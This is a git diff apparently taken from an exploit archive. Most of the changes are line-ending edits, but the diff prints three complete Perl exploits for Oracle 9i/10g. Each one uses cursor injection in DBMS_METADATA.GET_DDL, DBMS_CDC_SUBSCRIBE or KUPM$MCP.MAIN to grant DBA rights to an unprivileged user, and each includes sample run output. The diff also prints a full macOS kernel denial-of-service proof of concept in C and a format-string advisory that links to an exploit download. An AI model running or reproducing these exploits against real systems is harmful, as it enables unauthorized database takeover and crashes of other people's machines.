+exit; + +# milw0rm.com [2007-02-26] diff --git a/platforms/multiple/remote/3377.pl b/platforms/multiple/remote/3377.pl index 02436f7ce..c22f5a05d 100755 --- a/platforms/multiple/remote/3377.pl +++ b/platforms/multiple/remote/3377.pl @@ -1,134 +1,134 @@ -#!/usr/bin/perl -# -# Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g) -# - Version 2 - New "evil cursor injection" tip! -# - No "create procedure" privileg needed! -# - See: http://www.databasesecurity.com/ (Cursor Injection) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.securityfocus.com/bid/16287 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Fri Feb 26 12:32:55 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69. -# [-] Done! -# -# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil cursor... -# Cursor: 2 -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL -# ORA-06512: at "SYS.DBMS_METADATA", line 2576 -# ORA-06512: at "SYS.DBMS_METADATA", line 2627 -# ORA-06512: at "SYS.DBMS_METADATA", line 4220 -# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " -# DECLARE -# R CLOB; -# BEGIN -# R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''',''); -# END; -# "] at dbms_meta_get_ddlV2.pl line 101. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; -$dbh->func( 1000000, 'dbms_output_enable' ); - - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil cursor...\n"; -my $sth = $dbh->prepare(qq{ -DECLARE -MYC NUMBER; -BEGIN - MYC := DBMS_SQL.OPEN_CURSOR; - DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); - DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); -END; -} ); -$sth->execute; -my $cursor = undef; -while (my $line = $dbh->func( 'dbms_output_get' )) { - print "$line\n"; - if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} -} -$sth->finish; - -print "[-] Go ...(don't worry about errors)!\n"; -$sth = $dbh->prepare(qq{ -DECLARE - R CLOB; -BEGIN - R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''',''); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-02-26] +#!/usr/bin/perl +# +# Remote Oracle DBMS_METADATA.GET_DDL exploit (9i/10g) +# - Version 2 - New "evil cursor injection" tip! +# - No "create procedure" privileg needed! +# - See: http://www.databasesecurity.com/ (Cursor Injection) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.securityfocus.com/bid/16287 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Fri Feb 26 12:32:55 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_meta_get_ddlV2.pl line 69. +# [-] Done! +# +# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil cursor... +# Cursor: 2 +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-31600: invalid input value '||dbms_sql.execute(2)||' for parameter OBJECT_TYPE in function GET_DDL +# ORA-06512: at "SYS.DBMS_METADATA", line 2576 +# ORA-06512: at "SYS.DBMS_METADATA", line 2627 +# ORA-06512: at "SYS.DBMS_METADATA", line 4220 +# ORA-06512: at line 5 (DBD ERROR: OCIStmtExecute) [for Statement " +# DECLARE +# R CLOB; +# BEGIN +# R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute(2)||''',''); +# END; +# "] at dbms_meta_get_ddlV2.pl line 101. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl dbms_meta_get_ddlV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; +$dbh->func( 1000000, 'dbms_output_enable' ); + + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil cursor...\n"; +my $sth = $dbh->prepare(qq{ +DECLARE +MYC NUMBER; +BEGIN + MYC := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); + DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); +END; +} ); +$sth->execute; +my $cursor = undef; +while (my $line = $dbh->func( 'dbms_output_get' )) { + print "$line\n"; + if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} +} +$sth->finish; + +print "[-] Go ...(don't worry about errors)!\n"; +$sth = $dbh->prepare(qq{ +DECLARE + R CLOB; +BEGIN + R := SYS.DBMS_METADATA.GET_DDL('''||dbms_sql.execute($cursor)||''',''); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-02-26] diff --git a/platforms/multiple/remote/3378.pl b/platforms/multiple/remote/3378.pl index 3f46aaa8c..fb899dfe2 100755 --- a/platforms/multiple/remote/3378.pl +++ b/platforms/multiple/remote/3378.pl @@ -1,129 +1,129 @@ -#!/usr/bin/perl -# -# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g) -# - Version 2 - New "evil cursor injection" tip! -# - No "create procedure" privileg needed! -# - See: http://www.databasesecurity.com/ (Cursor Injection) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.securityfocus.com/archive/1/396133 -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92. -# [-] Done! -# -# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil cursor... -# Cursor: 2 -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist -# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37 -# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " -# BEGIN -# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||'''); -# END; -# "] at dbms_cdc_subscribeV2.pl line 122. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT DBA TO $user"; -print "[-] Wait...\n"; -$dbh->func( 1000000, 'dbms_output_enable' ); - - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil cursor...\n"; -my $sth = $dbh->prepare(qq{ -DECLARE -MYC NUMBER; -BEGIN - MYC := DBMS_SQL.OPEN_CURSOR; - DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); - DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); -END; -} ); -$sth->execute; -my $cursor = undef; -while (my $line = $dbh->func( 'dbms_output_get' )) { - print "$line\n"; - if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} -} -$sth->finish; - -print "[-] Go ...(don't worry about errors)!\n"; -$sth = $dbh->prepare(qq{ -BEGIN - SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||'''); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-02-26] +#!/usr/bin/perl +# +# Remote Oracle DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION exploit (9i/10g) +# - Version 2 - New "evil cursor injection" tip! +# - No "create procedure" privileg needed! +# - See: http://www.databasesecurity.com/ (Cursor Injection) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.securityfocus.com/archive/1/396133 +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Mon Feb 26 12:13:19 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01031: insufficient privileges (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_cdc_subscribeV2.pl line 92. +# [-] Done! +# +# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil cursor... +# Cursor: 2 +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-31425: subscription does not exist +# ORA-06512: at "SYS.DBMS_CDC_SUBSCRIBE", line 37 +# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " +# BEGIN +# SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute(2)||'''); +# END; +# "] at dbms_cdc_subscribeV2.pl line 122. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl dbms_cdc_subscribeV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT DBA TO $user"; +print "[-] Wait...\n"; +$dbh->func( 1000000, 'dbms_output_enable' ); + + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil cursor...\n"; +my $sth = $dbh->prepare(qq{ +DECLARE +MYC NUMBER; +BEGIN + MYC := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); + DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); +END; +} ); +$sth->execute; +my $cursor = undef; +while (my $line = $dbh->func( 'dbms_output_get' )) { + print "$line\n"; + if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} +} +$sth->finish; + +print "[-] Go ...(don't worry about errors)!\n"; +$sth = $dbh->prepare(qq{ +BEGIN + SYS.DBMS_CDC_SUBSCRIBE.ACTIVATE_SUBSCRIPTION('''||dbms_sql.execute($cursor)||'''); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-02-26] diff --git a/platforms/multiple/remote/3584.pl b/platforms/multiple/remote/3584.pl index dc39fdf36..bd376b82a 100755 --- a/platforms/multiple/remote/3584.pl +++ b/platforms/multiple/remote/3584.pl @@ -1,128 +1,128 @@ -#!/usr/bin/perl -# -# Remote Oracle KUPM$MCP.MAIN exploit (10g) -# - Version 2 - New "evil cursor injection" tip! -# - No "create procedure" privilege needed! -# - See: http://www.databasesecurity.com/ (Cursor Injection) -# -# Grant or revoke dba permission to unprivileged user -# -# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" -# -# REF: http://www.red-database-security.com/ -# -# AUTHOR: Andrea "bunker" Purificato -# http://rawlab.mindcreations.com -# -# DATE: Copyright 2007 - Tue Mar 27 10:46:55 CEST 2007 -# -# Oracle InstantClient (basic + sdk) required for DBD::Oracle -# -# -# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmainV2.pl line 104. -# [-] Done! -# -# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -g -# [-] Wait... -# [-] Creating evil cursor... -# Cursor: 2 -# [-] Go ...(don't worry about errors)! -# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874 -# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " -# BEGIN -# SYS.KUPM$MCP.MAIN(''' AND 0=dbms_sql.execute(2)--',''); -# END; -# "] at kupm-mcpmainV2.pl line 134. -# [-] YOU GOT THE POWAH!! -# -# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r -# [-] Wait... -# [-] Revoking DBA from BUNKER... -# [-] Done! -# - -use warnings; -use strict; -use DBI; -use Getopt::Std; -use vars qw/ %opt /; - -sub usage { - print <<"USAGE"; - -Syntax: $0 -h -s -u -p -g|-r [-P ] - -Options: - -h target server address - -s target sid name - -u user - -p password - - -g|-r (g)rant dba to user | (r)evoke dba from user - [-P Oracle port] - -USAGE - exit 0 -} - -my $opt_string = 'h:s:u:p:grP:'; -getopts($opt_string, \%opt) or &usage; -&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); -&usage if ( !$opt{g} and !$opt{r} ); -my $user = uc $opt{u}; - -my $dbh = undef; -if ($opt{P}) { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; -} else { - $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; -} - -my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user"; -print "[-] Wait...\n"; -$dbh->func( 1000000, 'dbms_output_enable' ); - - -if ($opt{r}) { - print "[-] Revoking DBA from $user...\n"; - $sqlcmd = "REVOKE DBA FROM $user"; - $dbh->do( $sqlcmd ); - print "[-] Done!\n"; - $dbh->disconnect; - exit; -} - -print "[-] Creating evil cursor...\n"; -my $sth = $dbh->prepare(qq{ -DECLARE -MYC NUMBER; -BEGIN - MYC := DBMS_SQL.OPEN_CURSOR; - DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); - DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); -END; -} ); -$sth->execute; -my $cursor = undef; -while (my $line = $dbh->func( 'dbms_output_get' )) { - print "$line\n"; - if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} -} -$sth->finish; - -print "[-] Go ...(don't worry about errors)!\n"; -$sth = $dbh->prepare(qq{ -BEGIN - SYS.KUPM\$MCP.MAIN(''' AND 0=dbms_sql.execute($cursor)--',''); -END; -}); -$sth->execute; -$sth->finish; -print "[-] YOU GOT THE POWAH!!\n"; -$dbh->disconnect; -exit; - -# milw0rm.com [2007-03-27] +#!/usr/bin/perl +# +# Remote Oracle KUPM$MCP.MAIN exploit (10g) +# - Version 2 - New "evil cursor injection" tip! +# - No "create procedure" privilege needed! +# - See: http://www.databasesecurity.com/ (Cursor Injection) +# +# Grant or revoke dba permission to unprivileged user +# +# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" +# +# REF: http://www.red-database-security.com/ +# +# AUTHOR: Andrea "bunker" Purificato +# http://rawlab.mindcreations.com +# +# DATE: Copyright 2007 - Tue Mar 27 10:46:55 CEST 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmainV2.pl line 104. +# [-] Done! +# +# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -g +# [-] Wait... +# [-] Creating evil cursor... +# Cursor: 2 +# [-] Go ...(don't worry about errors)! +# DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874 +# ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement " +# BEGIN +# SYS.KUPM$MCP.MAIN(''' AND 0=dbms_sql.execute(2)--',''); +# END; +# "] at kupm-mcpmainV2.pl line 134. +# [-] YOU GOT THE POWAH!! +# +# bunker@fin:~$ perl kupm-mcpmainV2.pl -h localhost -s test -u bunker -p **** -r +# [-] Wait... +# [-] Revoking DBA from BUNKER... +# [-] Done! +# + +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p -g|-r [-P ] + +Options: + -h target server address + -s target sid name + -u user + -p password + + -g|-r (g)rant dba to user | (r)evoke dba from user + [-P Oracle port] + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:grP:'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} ); +&usage if ( !$opt{g} and !$opt{r} ); +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user"; +print "[-] Wait...\n"; +$dbh->func( 1000000, 'dbms_output_enable' ); + + +if ($opt{r}) { + print "[-] Revoking DBA from $user...\n"; + $sqlcmd = "REVOKE DBA FROM $user"; + $dbh->do( $sqlcmd ); + print "[-] Done!\n"; + $dbh->disconnect; + exit; +} + +print "[-] Creating evil cursor...\n"; +my $sth = $dbh->prepare(qq{ +DECLARE +MYC NUMBER; +BEGIN + MYC := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''$sqlcmd'';commit;end;',0); + DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC); +END; +} ); +$sth->execute; +my $cursor = undef; +while (my $line = $dbh->func( 'dbms_output_get' )) { + print "$line\n"; + if ($line =~ /^Cursor: (\d)/) {$cursor = $1;} +} +$sth->finish; + +print "[-] Go ...(don't worry about errors)!\n"; +$sth = $dbh->prepare(qq{ +BEGIN + SYS.KUPM\$MCP.MAIN(''' AND 0=dbms_sql.execute($cursor)--',''); +END; +}); +$sth->execute; +$sth->finish; +print "[-] YOU GOT THE POWAH!!\n"; +$dbh->disconnect; +exit; + +# milw0rm.com [2007-03-27] diff --git a/platforms/multiple/remote/745.cgi b/platforms/multiple/remote/745.cgi index 62594a433..17982a5ed 100755 --- a/platforms/multiple/remote/745.cgi +++ b/platforms/multiple/remote/745.cgi @@ -144,6 +144,6 @@ value="uptime"> ~; -} - -# milw0rm.com [2005-01-08] +} + +# milw0rm.com [2005-01-08] diff --git a/platforms/multiple/remote/746.pl b/platforms/multiple/remote/746.pl index d7047cb42..96a4a8872 100755 --- a/platforms/multiple/remote/746.pl +++ b/platforms/multiple/remote/746.pl @@ -153,6 +153,6 @@ if ($sock){ } } } -} - -# milw0rm.com [2005-01-08] +} + +# milw0rm.com [2005-01-08] diff --git a/platforms/multiple/webapps/10821.txt b/platforms/multiple/webapps/10821.txt index c8751af92..81016b398 100755 --- a/platforms/multiple/webapps/10821.txt +++ b/platforms/multiple/webapps/10821.txt @@ -1,4 +1,3 @@ - Application: WingFTP Server 3.2.4 (maybe earlier versions too) Link: http://www.wftpserver.com/ Vulnerability: CSRF diff --git a/platforms/osx/dos/3166.html b/platforms/osx/dos/3166.html index faf756296..42acc6f3b 100755 --- a/platforms/osx/dos/3166.html +++ b/platforms/osx/dos/3166.html @@ -1,21 +1,21 @@ - - - - MOAB-20-01-2007 - - - - - - -# milw0rm.com [2007-01-21] + + + + MOAB-20-01-2007 + + + + + + +# milw0rm.com [2007-01-21] diff --git a/platforms/osx/dos/8265.c b/platforms/osx/dos/8265.c index ea93989d1..b8c9d71d0 100755 --- a/platforms/osx/dos/8265.c +++ b/platforms/osx/dos/8265.c @@ -1,73 +1,73 @@ -/* xnu-vfssysctl-dos.c - * - * Copyright (c) 2008 by - * - * Apple MACOS X xnu <= 1228.x local kernel DoS POC - * by mu-b - Wed 19 Nov 2008 - * - * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386) - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! - */ - -#include -#include - -#include -#include -#include -#include -#include -#include -#include - -void -hammer (void *arg) -{ - char buf[1024 * (255 + 1)]; - int n, name[6]; - - memset (buf, 0, sizeof buf); - - while (1) - { - name[0] = CTL_VFS; - name[1] = 17; - name[2] = HFS_SET_PKG_EXTENSIONS; - name[3] = (int) buf; - name[4] = 1024; - name[5] = (rand () % 254) + 1; - n = sysctl (name, 6, NULL, NULL, NULL, 0); - - usleep(10); - } -} - -int -main (int argc, char **argv) -{ - int i, n, tid; - - printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); - - for (i = 0; i < 4; i++) - { - n = pthread_create (&tid, NULL, hammer, NULL); - if (n < 0) - { - fprintf (stderr, "failed creating hammer thread\n"); - return (EXIT_FAILURE); - } - } - - while (1) - sleep (1); - - /* not reached! */ - return (EXIT_SUCCESS); -} - -// milw0rm.com [2009-03-23] +/* xnu-vfssysctl-dos.c + * + * Copyright (c) 2008 by + * + * Apple MACOS X xnu <= 1228.x local kernel DoS POC + * by mu-b - Wed 19 Nov 2008 + * + * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386) + * + * - Private Source Code -DO NOT DISTRIBUTE - + * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! + */ + +#include +#include + +#include +#include +#include +#include +#include +#include +#include + +void +hammer (void *arg) +{ + char buf[1024 * (255 + 1)]; + int n, name[6]; + + memset (buf, 0, sizeof buf); + + while (1) + { + name[0] = CTL_VFS; + name[1] = 17; + name[2] = HFS_SET_PKG_EXTENSIONS; + name[3] = (int) buf; + name[4] = 1024; + name[5] = (rand () % 254) + 1; + n = sysctl (name, 6, NULL, NULL, NULL, 0); + + usleep(10); + } +} + +int +main (int argc, char **argv) +{ + int i, n, tid; + + printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); + + for (i = 0; i < 4; i++) + { + n = pthread_create (&tid, NULL, hammer, NULL); + if (n < 0) + { + fprintf (stderr, "failed creating hammer thread\n"); + return (EXIT_FAILURE); + } + } + + while (1) + sleep (1); + + /* not reached! */ + return (EXIT_SUCCESS); +} + +// milw0rm.com [2009-03-23] diff --git a/platforms/osx/local/30096.txt b/platforms/osx/local/30096.txt new file mode 100755 index 000000000..22e82fe36 --- /dev/null +++ b/platforms/osx/local/30096.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/24208/info + +Apple Mac OS X's VPN service daemon is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. + +Attackers may exploit this issue to crash the application or execute arbitrary code with superuser privileges. Successful exploits can result in a complete compromise of vulnerable computers. + +Apple Mac OS X Server 10.4.9 and prior versions are vulnerable to this issue. + +This issue was originally included in BID 24144 (Apple Mac OS X 2007-005 Multiple Security Vulnerabilities), but has been given its own record. + +http://www.exploit-db.com/sploits/30096.tar.gz \ No newline at end of file diff --git a/platforms/php/webapps/10419.txt b/platforms/php/webapps/10419.txt index 1cc803547..60f4ca6a7 